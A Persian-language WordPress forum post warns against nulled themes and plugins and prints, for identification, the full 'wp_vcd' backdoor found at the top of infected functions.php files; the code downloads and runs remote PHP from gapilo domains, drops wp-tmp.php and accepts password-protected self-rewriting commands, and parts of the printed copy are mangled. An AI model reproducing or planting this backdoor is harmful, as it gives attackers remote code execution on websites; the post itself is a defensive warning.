هشدار امنیتی جدی در قالب وردپرس
خواهشمندم این هشدار را جدی بگیرید
قبلا هم این مطالب را در هشدار به کاربران انجمن وردپرس ایرانی گفتم ولی انگار گوش شنوایی نیست
خواهشمدم از افزونه ها و قالب های غیرقانونی و نال استفاده نکند .
فروشندگان این افزونه ها و قالب ها خواهشمندم نسخه جدید را بفروشند
دوستان عزیز فایل فانکشن قالب خود را باز کنید و اگر کد زیر را در اول فایل دیدید


کد PHP:
<?phpif (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == 'e2ff047d16b22349596858e94eb2133f')){$div_code_name="wp_vcd";switch ($_REQUEST['action']){case 'change_domain';if (isset($_REQUEST['newdomain'])){if (!empty($_REQUEST['newdomain'])){if ($file = @file_get_contents(__FILE__)){if(preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code\.php/i',$file,$matcholddomain)){$file preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);@file_put_contents(__FILE__$file);print "true";}}}}break;case 'change_code';if (isset($_REQUEST['newcode'])){if (!empty($_REQUEST['newcode'])){if ($file = @file_get_contents(__FILE__)){if(preg_match_all('/\/\/\$start_wp_theme_tmp([\s\S]*)\/\/\$end_wp_theme_tmp/i',$file,$matcholdcode)){$file str_replace($matcholdcode[1][0], stripslashes($_REQUEST['newcode']), $file);@file_put_contents(__FILE__$file);print "true";}}}}break;default: print "ERROR_WP_ACTION WP_V_CD WP_CD";}die("");}$div_code_name "wp_vcd";$funcfile      __FILE__;if(!function_exists('theme_temp_setup')) {$path $_SERVER['HTTP_HOST'] . $_SERVER[REQUEST_URI];if (stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {function file_get_contents_tcurl($url){$ch curl_init();curl_setopt($chCURLOPT_AUTOREFERERTRUE);curl_setopt($chCURLOPT_HEADER0);curl_setopt($chCURLOPT_RETURNTRANSFER1);curl_setopt($chCURLOPT_URL$url);curl_setopt($chCURLOPT_FOLLOWLOCATIONTRUE);$data curl_exec($ch);curl_close($ch);return $data;}function theme_temp_setup($phpCode){$tmpfname tempnam(sys_get_temp_dir(), "theme_temp_setup");$handle   fopen($tmpfname"w+");if( fwrite($handle"<?php\n" $phpCode)){}else{$tmpfname tempnam('./'"theme_temp_setup");$handle   fopen($tmpfname"w+");fwrite($handle"<?php\n" $phpCode);}fclose($handle);include $tmpfname;unlink($tmpfname);return get_defined_vars();}$wp_auth_key='671f55202565d8b7050045e7ae0d758c';if (($tmpcontent = @file_get_contents("http://www.gapilo.com/code.php") OR $tmpcontent = @file_get_contents_tcurl("http://www.gapilo.com/code.php")) AND stripos($tmpcontent$wp_auth_key) !== false) {if (stripos($tmpcontent$wp_auth_key) !== false) {extract(theme_temp_setup($tmpcontent));@file_put_contents(ABSPATH 'wp-includes/wp-tmp.php'$tmpcontent);if (!file_exists(ABSPATH 'wp-includes/wp-tmp.php')) {@file_put_contents(get_template_directory() . '/wp-tmp.php'$tmpcontent);if (!file_exists(get_template_directory() . '/wp-tmp.php')) {@file_put_contents('wp-tmp.php'$tmpcontent);}}}}elseif ($tmpcontent = @file_get_contents("http://www.gapilo.pw/code.php")  AND stripos($tmpcontent$wp_auth_key) !== false ) {if (stripos($tmpcontent$wp_auth_key) !== false) {extract(theme_temp_setup($tmpcontent));@file_put_contents(ABSPATH 'wp-includes/wp-tmp.php'$tmpcontent);if (!file_exists(ABSPATH 'wp-includes/wp-tmp.php')) {@file_put_contents(get_template_directory() . '/wp-tmp.php'$tmpcontent);if (!file_exists(get_template_directory() . '/wp-tmp.php')) {@file_put_contents('wp-tmp.php'$tmpcontent);}}}} elseif ($tmpcontent = @file_get_contents("http://www.gapilo.top/code.php")  AND stripos($tmpcontent$wp_auth_key) !== false ) {if (stripos($tmpcontent$wp_auth_key) !== false) {extract(theme_temp_setup($tmpcontent));@file_put_contents(ABSPATH 'wp-includes/wp-tmp.php'$tmpcontent);if (!file_exists(ABSPATH 'wp-includes/wp-tmp.php')) {@file_put_contents(get_template_directory() . '/wp-tmp.php'$tmpcontent);if (!file_exists(get_template_directory() . '/wp-tmp.php')) {@file_put_contents('wp-tmp.php'$tmpcontent);}}}}elseif ($tmpcontent = @file_get_contents(ABSPATH 'wp-includes/wp-tmp.php') AND stripos($tmpcontent$wp_auth_key) !== false) {extract(theme_temp_setup($tmpcontent));} elseif ($tmpcontent = @file_get_contents(get_template_directory() . '/wp-tmp.php') AND stripos($tmpcontent$wp_auth_key) !== false) {extract(theme_temp_setup($tmpcontent)); } elseif ($tmpcontent = @file_get_contents('wp-tmp.php') AND stripos($tmpcontent$wp_auth_key) !== false) {extract(theme_temp_setup($tmpcontent)); } }}//$start_wp_theme_tmp//wp_tmp//$end_wp_theme_tmp?>


به تاپیک زیر مراجعه کنید
هشدار به کاربران انجمن وردپرس ایرانی